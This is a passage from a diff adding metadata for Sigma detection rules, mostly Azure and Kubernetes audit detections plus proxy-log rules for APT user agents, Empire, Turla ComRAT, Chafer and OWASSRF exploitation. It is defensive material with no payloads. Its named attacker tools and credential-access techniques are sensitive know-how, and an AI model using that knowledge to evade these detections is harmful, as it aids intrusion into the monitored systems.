"2021/08/07", + "falsepositive": [ + "Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_container_registry_created_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "93e0ef48-37c8-49ed-a02c-038aab23628e", + "value": "Azure Container Registry Created or Deleted" + }, + { + "description": "Detect failed attempts to sign in to disabled accounts.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_login_to_disabled_account.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_login_to_disabled_account.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", + "value": "Login to Disabled Account" + }, + { + "description": "Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_events_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562", + "attack.t1562.001" + ] + }, + "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", + "value": "Azure Kubernetes Events Deleted" + }, + { + "description": "User Added to an Administrator's Azure AD Role", + "meta": { + "author": "Raphaël CALVET, @MetallicHack", + "creation_date": "2021/10/04", + "falsepositive": [ + "PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled." + ], + "filename": "azure_ad_user_added_to_admin_role.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", + "https://attack.mitre.org/techniques/T1098/003/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098.003" + ] + }, + "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", + "value": "User Added to an Administrator's Azure AD Role" + }, + { + "description": "Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/22", + "falsepositive": [ + "Azure Kubernetes CronJob/Job may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_cronjob.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.execution" + ] + }, + "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", + "value": "Azure Kubernetes CronJob" + }, + { + "description": "Detects guest users being invited to tenant by non-approved inviters", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", + "value": "Guest Users Invited To Tenant By Non Approved Inviters" + }, + { + "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/09", + "falsepositive": [ + "Actual admin using PIM." + ], + "filename": "azure_pim_activation_approve_deny.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_activation_approve_deny.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "039a7469-0296-4450-84c0-f6966b16dc6d", + "value": "PIM Approvals And Deny Elevation" + }, + { + "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_rolebinding_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access" + ] + }, + "uuid": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", + "value": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted" + }, + { + "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_delegated_permissions_all_users.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_delegated_permissions_all_users.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", + "value": "Delegated Permissions Granted For All Users" + }, + { + "description": "Detects when app permissions (app roles) for other APIs are granted", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_permissions_for_api.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_for_api.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "ba2a7c80-027b-460f-92e2-57d113897dbc", + "value": "App Permissions Granted For Other APIs" + }, + { + "description": "Identifies when a firewall is created, modified, or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_firewall_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", + "value": "Azure Firewall Modified or Deleted" + }, + { + "description": "Identifies when DNS zone is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_dns_zone_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "af6925b0-8826-47f1-9324-337507a0babd", + "value": "Azure DNS Zone Modified or Deleted" + }, + { + "description": "Identifies when a Virtual Network is modified or deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_virtual_network_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", + "value": "Azure Virtual Network Modified or Deleted" + }, + { + "description": "Monitor and alert for changes to the device registration policy.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_device_registration_policy_changes.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_policy_changes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484" + ] + }, + "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", + "value": "Changes to Device Registration Policy" + }, + { + "description": "Detect when users are authenticating without MFA being required.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/27", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_only_single_factor_auth_required.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", + "value": "Azure AD Only Single Factor Authentication Required" + }, + { + "description": "Monitor and alert for sign-ins where the device was non-compliant.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_sign_ins_from_noncompliant_devices.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", + "value": "Sign-ins from Non-Compliant Devices" + }, + { + "description": "Detects when a new admin is created.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton", + "creation_date": "2022/08/11", + "falsepositive": [ + "A legitimate new admin account being created" + ], + "filename": "azure_privileged_account_creation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_privileged_account_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", + "value": "Privileged Account Creation" + }, + { + "description": "Identifies when a device in azure is no longer managed or compliant", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Administrator may have forgotten to review the device." + ], + "filename": "azure_device_no_longer_managed_or_compliant.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "542b9912-c01f-4e3f-89a8-014c48cdca7d", + "value": "Azure Device No Longer Managed or Compliant" + }, + { + "description": "Monitor and alert on group membership removal of groups that have CA policy modification access", + "meta": { + "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", + "creation_date": "2022/08/04", + "falsepositive": [ + "User removed from the group is approved" + ], + "filename": "azure_group_user_removal_ca_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_removal_ca_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", + "value": "User Removed From Group With CA Policy Modification Access" + }, + { + "description": "Detects when there is a interruption in the authentication process.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_unusual_authentication_interruption.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_unusual_authentication_interruption.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "8366030e-7216-476b-9927-271d79f13cf3", + "value": "Azure Unusual Authentication Interruption" + }, + { + "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.", + "meta": { + "author": "@ionsor", + "creation_date": "2022/02/08", + "falsepositive": [ + "Authorized modification by administrators" + ], + "filename": "azure_mfa_disabled.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", + "https://attack.mitre.org/techniques/T1556/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_disabled.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1556" + ] + }, + "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", + "value": "Disabled MFA to Bypass Authentication Mechanisms" + }, + { + "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.\n", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/01", + "falsepositive": [ + "Applications that are input constrained will need to use device code flow and are valid authentications." + ], + "filename": "azure_app_device_code_authentication.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_device_code_authentication.yml" + ], + "tags": [ + "attack.t1078", + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "uuid": "248649b7-d64f-46f0-9fb2-a52774166fb5", + "value": "Application Using Device Code Authentication Flow" + }, + { + "description": "Detects when end user consent is blocked due to risk-based consent.", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_app_end_user_consent_blocked.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent_blocked.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "7091372f-623c-4293-bc37-20c32b3492be", + "value": "End User Consent Blocked" + }, + { + "description": "Detects when an account is disabled or blocked for sign in but tried to log in", + "meta": { + "author": "Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/06/17", + "falsepositive": [ + "Account disabled or blocked in error", + "Automation account has been blocked or disabled" + ], + "filename": "azure_blocked_account_attempt.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_blocked_account_attempt.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", + "value": "Account Disabled or Blocked for Sign in Attempts" + }, + { + "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_network_p2s_vpn_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "d9557b75-267b-4b43-922f-a775e2d1f792", + "value": "Azure Point-to-site VPN Modified or Deleted" + }, + { + "description": "Identifies when secrets are modified or deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "Secrets being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_keyvault_secrets_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ] + }, + "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", + "value": "Azure Keyvault Secrets Modified or Deleted" + }, + { + "description": "Identifies when a Azure Kubernetes network policy is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_network_policy_change.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access" + ] + }, + "uuid": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", + "value": "Azure Kubernetes Network Policy Change" + }, + { + "description": "Identifies when a service account is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_service_account_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", + "value": "Azure Kubernetes Service Account Modified or Deleted" + }, + { + "description": "Detects suspicious user agent strings used in APT malware in proxy logs", + "meta": { + "author": "Florian Roth, Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Old browsers" + ], + "filename": "proxy_ua_apt.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_apt.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", + "value": "APT User Agent" + }, + { + "description": "Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_susp_base64.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp_base64.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", + "value": "Suspicious Base64 User Agent" + }, + { + "description": "Detects user agent and URI paths used by empire agents", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/13", + "falsepositive": [ + "Valid requests with this exact user agent to server scripts of the defined names" + ], + "filename": "proxy_empire_ua_uri_combos.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/BC-SECURITY/Empire", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empire_ua_uri_combos.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", + "value": "Empire UserAgent URI Combo" + }, + { + "description": "Detects Bitsadmin connections to domains with uncommon TLDs", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2019/03/07", + "falsepositive": [ + "Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca" + ], + "filename": "proxy_ua_bitsadmin_susp_tld.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/jhencinski/status/1102695118455349248", + "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190" + ] + }, + "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", + "value": "Bitsadmin to Uncommon TLD" + }, + { + "description": "Detects Turla ComRAT patterns", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_turla_comrat.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_turla_comrat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001", + "attack.g0010" + ] + }, + "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", + "value": "Turla ComRAT" + }, + { + "description": "Detects HTTP requests used by Chafer malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_chafer_malware.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://securelist.com/chafer-used-remexi-malware/89538/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_chafer_malware.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "fb502828-2db0-438e-93e6-801c7548686d", + "value": "Chafer Malware URL Pattern" + }, + { + "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "proxy_exchange_owassrf_poc_exploitation.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", + "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_exchange_owassrf_poc_exploitation.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "fdd7e904-7304-4616-a46a-e32f917c4be4", + "value": "OWASSRF Exploitation Attempt Using Public POC - Proxy" + }, + { + "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": 